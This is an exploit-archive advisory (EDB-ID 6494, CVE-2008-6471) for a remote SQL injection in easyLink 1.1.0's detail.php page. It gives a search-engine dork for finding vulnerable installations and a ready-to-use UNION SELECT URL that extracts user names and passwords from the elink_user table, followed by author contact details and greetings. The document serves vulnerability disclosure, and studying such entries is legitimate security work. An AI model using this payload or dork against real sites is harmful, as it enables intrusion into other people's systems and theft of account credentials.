easyLink 1.1.0 (detail.php) Remote SQL Injection Vulnerability

EDB-ID: 6494 CVE: 2008-6471 OSVDB-ID: 48395
Verified: Author: Egypt Coder Published: 2008-09-19
Download Exploit: Source Raw Download Vulnerable App: N/A
================================================================================
easyLink V1.1.0 (detail.php) Remote SQL Injection Vulnerability
================================================================================



Discovered By: Egypt Coder

home : WWW.Sec-Area.com

Mail: Egyptcoder@hotmail.com



Dork: Engine powered by easyLink V1.1.0.



Exploit :


http://localhost/links/detail.php?act=show&cat=1+union+select+1,2,concat_ws(0x3a,user,passwort),4,5+from+elink_user


Greets  rUnViruS, Error Code, H666p , Fear Master , ProViDoR

# milw0rm.com [2008-09-19]